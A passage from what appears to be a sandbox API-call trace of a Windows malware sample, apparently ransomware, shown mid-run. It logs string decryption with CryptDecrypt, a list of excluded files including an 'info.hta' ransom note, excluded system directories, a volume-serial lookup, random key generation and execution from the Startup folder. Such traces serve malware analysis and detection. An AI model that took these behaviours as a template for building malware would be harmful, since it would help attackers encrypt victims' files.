hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x43f518 | out: pbData=0x1db54e8, pdwDataLen=0x43f518) returned 1 [0109.092] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.092] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x1db1730 [0109.092] CryptImportKey (in: hProv=0x254d70, pbData=0x43f4f4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f55c | out: phKey=0x43f55c*=0x29bf60) returned 1 [0109.092] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f544, dwFlags=0x0) returned 1 [0109.092] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1730, pdwDataLen=0x43f510 | out: pbData=0x1db1730, pdwDataLen=0x43f510) returned 1 [0109.092] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.092] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x70) returned 0x1db5580 [0109.092] CryptImportKey (in: hProv=0x254d70, pbData=0x43f4ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f554 | out: phKey=0x43f554*=0x29bf60) returned 1 [0109.092] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f53c, dwFlags=0x0) returned 1 [0109.092] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5580, pdwDataLen=0x43f508 | out: pbData=0x1db5580, pdwDataLen=0x43f508) returned 1 [0109.092] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.092] htonl (hostlong=0x9c354b42) returned 0x424b359c [0109.092] CryptGenRandom (in: hProv=0x254d70, dwLen=0x20, pbBuffer=0x43f648 | out: pbBuffer=0x43f648) returned 1 [0109.092] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x28) returned 0x1db1748 [0109.092] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x1db55f8 [0109.092] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4) returned 0x1db1778 [0109.092] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x14) returned 0x1db5610 [0109.093] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x1db5630 [0109.093] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x80) returned 0x1db5648 [0109.093] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x1db56d0 [0109.093] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x82) returned 0x1db56e8 [0109.093] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x1db5778 [0109.093] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4) returned 0x1db5790 [0109.093] CryptAcquireContextW (in: phProv=0x83fcf4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x83fcf4*=0x2a5550) returned 1 [0109.094] CryptGenRandom (in: hProv=0x2a5550, dwLen=0x55, pbBuffer=0x43f5b2 | out: pbBuffer=0x43f5b2) returned 1 [0109.094] GetLastError () returned 0x0 [0109.094] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x1db57a0 [0109.094] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x80) returned 0x1db57b8 [0109.094] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x1db5840 [0109.094] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x2) returned 0x1db5858 [0109.094] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4) returned 0x1db5868 [0109.094] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x1db5878 [0109.094] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x80) returned 0x1db5890 [0109.094] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x1db5918 [0109.094] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4) returned 0x3016b90 [0109.095] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x1db5858, Size=0x82) returned 0x3016ba0 [0109.095] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x3016b90, Size=0x100) returned 0x3016c30 [0109.095] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x3016d38 [0109.095] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x82) returned 0x3016d50 [0109.095] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x3016df8 [0109.095] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x82) returned 0x30175e0 [0109.095] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x3016d50, Size=0x104) returned 0x3017670 [0109.095] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x1db5648, Size=0x100) returned 0x3017780 [0109.095] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x3016ba0, Size=0x104) returned 0x3017888 [0109.095] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x3016c30, Size=0x200) returned 0x3017998 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5868 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3017998 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5918 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db57b8 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db57a0 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5890 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5878 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3017888 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5840 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3017670 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3016d38 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30175e0 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3016df8 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1778 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db55f8 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db56e8 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db56d0 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3017780 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5630 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5790 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1748 | out: hHeap=0x1db0000) returned 1 [0109.096] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5610 | out: hHeap=0x1db0000) returned 1 [0109.096] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0xa4) returned 0x3016b90 [0109.096] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x62) returned 0x3016c40 [0109.096] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x3016c40, Size=0xc2) returned 0x3016c40 [0109.097] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x3016df8 [0109.097] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0xb40) returned 0x1db9650 [0109.097] CryptImportKey (in: hProv=0x254d70, pbData=0x43f4e4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f54c | out: phKey=0x43f54c*=0x29bf60) returned 1 [0109.097] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f534, dwFlags=0x0) returned 1 [0109.097] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9650, pdwDataLen=0x43f500 | out: pbData=0x1db9650, pdwDataLen=0x43f500) returned 1 [0109.097] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.097] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x3016e10 [0109.097] CryptImportKey (in: hProv=0x254d70, pbData=0x43f4dc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f544 | out: phKey=0x43f544*=0x29bf60) returned 1 [0109.097] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f52c, dwFlags=0x0) returned 1 [0109.097] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3016e10, pdwDataLen=0x43f4f8 | out: pbData=0x3016e10, pdwDataLen=0x43f4f8) returned 1 [0109.097] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.097] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x3016d10 [0109.097] CryptImportKey (in: hProv=0x254d70, pbData=0x43f4b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f51c | out: phKey=0x43f51c*=0x29bf60) returned 1 [0109.097] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f504, dwFlags=0x0) returned 1 [0109.097] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3016d10, pdwDataLen=0x43f4d0 | out: pbData=0x3016d10, pdwDataLen=0x43f4d0) returned 1 [0109.097] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.097] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x84) returned 0x1db55f8 [0109.097] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x84) returned 0x1dba1b0 [0109.097] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db5688 [0109.097] CryptImportKey (in: hProv=0x254d70, pbData=0x43f48c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f4f4 | out: phKey=0x43f4f4*=0x29bf60) returned 1 [0109.097] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f4dc, dwFlags=0x0) returned 1 [0109.097] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5688, pdwDataLen=0x43f4a8 | out: pbData=0x1db5688, pdwDataLen=0x43f4a8) returned 1 [0109.097] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.097] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5688 | out: hHeap=0x1db0000) returned 1 [0109.097] ExpandEnvironmentStringsW (in: lpSrc="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys", lpDst=0x1db55f8, nSize=0x42 | out: lpDst="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys") returned 0x42 [0109.097] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1dba1b0 | out: hHeap=0x1db0000) returned 1 [0109.097] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3016d10 | out: hHeap=0x1db0000) returned 1 [0109.097] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x60) returned 0x3016d10 [0109.097] CryptImportKey (in: hProv=0x254d70, pbData=0x43f4b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f518 | out: phKey=0x43f518*=0x29bf60) returned 1 [0109.097] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f500, dwFlags=0x0) returned 1 [0109.098] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3016d10, pdwDataLen=0x43f4cc | out: pbData=0x3016d10, pdwDataLen=0x43f4cc) returned 1 [0109.098] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.098] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x5c) returned 0x3016d78 [0109.098] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x5c) returned 0x1db5688 [0109.098] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db56f0 [0109.098] CryptImportKey (in: hProv=0x254d70, pbData=0x43f488, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f4f0 | out: phKey=0x43f4f0*=0x29bf60) returned 1 [0109.098] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f4d8, dwFlags=0x0) returned 1 [0109.098] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db56f0, pdwDataLen=0x43f4a4 | out: pbData=0x1db56f0, pdwDataLen=0x43f4a4) returned 1 [0109.098] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.098] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db56f0 | out: hHeap=0x1db0000) returned 1 [0109.098] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows;Program Files;Program Files (x86);", lpDst=0x3016d78, nSize=0x2e | out: lpDst="C:\\Windows;Program Files;Program Files (x86);") returned 0x2e [0109.098] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5688 | out: hHeap=0x1db0000) returned 1 [0109.098] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3016d10 | out: hHeap=0x1db0000) returned 1 [0109.098] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20a) returned 0x1db5688 [0109.098] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20a) returned 0x30175e0 [0109.098] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30175e0, nSize=0x104 | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe")) returned 0x45 [0109.098] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30175e0 | out: hHeap=0x1db0000) returned 1 [0109.098] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0xb38) returned 0x1dbc198 [0109.098] GetLastError () returned 0x0 [0109.098] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x1dbc198, Size=0xb46) returned 0x1dbc198 [0109.098] GetLastError () returned 0x0 [0109.098] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x86) returned 0x1dba1b0 [0109.098] GetLastError () returned 0x0 [0109.098] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x1dba1b0, Size=0x98) returned 0x30175e0 [0109.098] GetLastError () returned 0x0 [0109.098] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x5e) returned 0x3016d10 [0109.098] GetLastError () returned 0x0 [0109.098] CryptImportKey (in: hProv=0x254d70, pbData=0x43f60c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f674 | out: phKey=0x43f674*=0x29bf60) returned 1 [0109.098] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f65c, dwFlags=0x0) returned 1 [0109.098] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3016d78, pdwDataLen=0x43f628 | out: pbData=0x3016d78, pdwDataLen=0x43f628) returned 1 [0109.098] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.098] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x3016da0 [0109.099] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db16d0 [0109.099] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db54e8 [0109.099] CryptImportKey (in: hProv=0x254d70, pbData=0x43f5e4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f64c | out: phKey=0x43f64c*=0x29bf60) returned 1 [0109.099] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f634, dwFlags=0x0) returned 1 [0109.099] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x43f600 | out: pbData=0x1db54e8, pdwDataLen=0x43f600) returned 1 [0109.099] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.099] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0109.099] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x3016da0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0109.099] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0109.099] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3016d78 | out: hHeap=0x1db0000) returned 1 [0109.099] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x43f6b4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x43f6b4*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0109.099] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3016da0 | out: hHeap=0x1db0000) returned 1 [0109.099] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x28) returned 0x3016d78 [0109.099] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x3016e10 [0109.099] CryptImportKey (in: hProv=0x254d70, pbData=0x43f51c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f584 | out: phKey=0x43f584*=0x29bf60) returned 1 [0109.099] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f56c, dwFlags=0x0) returned 1 [0109.099] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3016e10, pdwDataLen=0x43f538 | out: pbData=0x3016e10, pdwDataLen=0x43f538) returned 1 [0109.099] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.099] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x3016e28 [0109.099] CryptImportKey (in: hProv=0x254d70, pbData=0x43f514, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f57c | out: phKey=0x43f57c*=0x29bf60) returned 1 [0109.099] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f564, dwFlags=0x0) returned 1 [0109.099] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3016e28, pdwDataLen=0x43f530 | out: pbData=0x3016e28, pdwDataLen=0x43f530) returned 1 [0109.099] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.099] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x3016e40 [0109.099] CryptImportKey (in: hProv=0x254d70, pbData=0x43f50c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f574 | out: phKey=0x43f574*=0x29bf60) returned 1 [0109.099] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f55c, dwFlags=0x0) returned 1 [0109.099] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3016e40, pdwDataLen=0x43f528 | out: pbData=0x3016e40, pdwDataLen=0x43f528) returned 1 [0109.099] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.099] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x3016e58 [0109.099] CryptImportKey (in: hProv=0x254d70, pbData=0x43f504, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f56c | out: phKey=0x43f56c*=0x29bf60) returned 1 [0109.099] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f554, dwFlags=0x0) returned 1 [0109.099] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3016e58, pdwDataLen=0x43f520 | out: pbData=0x3016e58, pdwDataLen=0x43f520) returned 1 [0109.099] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.099] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0109.099] CryptImportKey (in: hProv=0x254d70, pbData=0x43f4fc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f564 | out: phKey=0x43f564*=0x29bf60) returned 1 [0109.099] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f54c, dwFlags=0x0) returned 1 [0109.100] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x43f518 | out: pbData=0x1db16d0, pdwDataLen=0x43f518) returned 1 [0109.100] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.100] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x3016e70 [0109.100] CryptImportKey (in: hProv=0x254d70, pbData=0x43f4f4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f55c | out: phKey=0x43f55c*=0x29bf60) returned 1 [0109.100] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f544, dwFlags=0x0) returned 1 [0109.100] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3016e70, pdwDataLen=0x43f510 | out: pbData=0x3016e70, pdwDataLen=0x43f510) returned 1 [0109.100] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.100] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x70) returned 0x1db54e8 [0109.100] CryptImportKey (in: hProv=0x254d70, pbData=0x43f4ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f554 | out: phKey=0x43f554*=0x29bf60) returned 1 [0109.100] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f53c, dwFlags=0x0) returned 1 [0109.100] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x43f508 | out: pbData=0x1db54e8, pdwDataLen=0x43f508) returned 1 [0109.100] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.100] htonl (hostlong=0x9c354b42) returned 0x424b359c [0109.100] CryptGenRandom (in: hProv=0x254d70, dwLen=0x20, pbBuffer=0x43f648 | out: pbBuffer=0x43f648) returned 1 [0109.100] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x28) returned 0x3016da8 [0109.100] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x3016e88 [0109.100] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4) returned 0x1db1768 [0109.100] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x14) returned 0x1db5560 [0109.100] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x3016ea0 [0109.100] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x80) returned 0x1db5580 [0109.100] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x3016eb8 [0109.100] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x82) returned 0x1dba1b0 [0109.100] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x3016ed0 [0109.100] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4) returned 0x3017698 [0109.100] CryptGenRandom (in: hProv=0x2a5550, dwLen=0x55, pbBuffer=0x43f5b2 | out: pbBuffer=0x43f5b2) returned 1 [0109.100] GetLastError () returned 0x0 [0109.100] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x30176a8, Size=0x82) returned 0x1dba240 [0109.100] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x30176c8, Size=0x100) returned 0x1db5718 [0109.100] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x3016f48 [0109.100] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x82) returned 0x1dba2d0 [0109.100] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x3016f60 [0109.100] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x82) returned 0x1dba360 [0109.100] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x1dba2d0, Size=0x104) returned 0x1db5820 [0109.100] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x1db5580, Size=0x100) returned 0x3017a80 [0109.100] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x1dba240, Size=0x104) returned 0x3017b88 [0109.101] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x1db5718, Size=0x200) returned 0x3017c98 [0109.101] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30176b8 | out: hHeap=0x1db0000) returned 1 [0109.101] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3017c98 | out: hHeap=0x1db0000) returned 1 [0109.101] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3016f30 | out: hHeap=0x1db0000) returned 1 [0109.101] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5608 | out: hHeap=0x1db0000) returned 1 [0109.101] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3016ee8 | out: hHeap=0x1db0000) returned 1 [0109.101] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5690 | out: hHeap=0x1db0000) returned 1 [0109.101] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3016f18 | out: hHeap=0x1db0000) returned 1 [0109.101] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3017b88 | out: hHeap=0x1db0000) returned 1 [0109.101] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3016f00 | out: hHeap=0x1db0000) returned 1 [0109.101] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5820 | out: hHeap=0x1db0000) returned 1 [0109.101] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3016f48 | out: hHeap=0x1db0000) returned 1 [0109.101] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1dba360 | out: hHeap=0x1db0000) returned 1 [0109.101] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3016f60 | out: hHeap=0x1db0000) returned 1 [0109.101] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1768 | out: hHeap=0x1db0000) returned 1 [0109.101] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3016e88 | out: hHeap=0x1db0000) returned 1 [0109.102] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1dba1b0 | out: hHeap=0x1db0000) returned 1 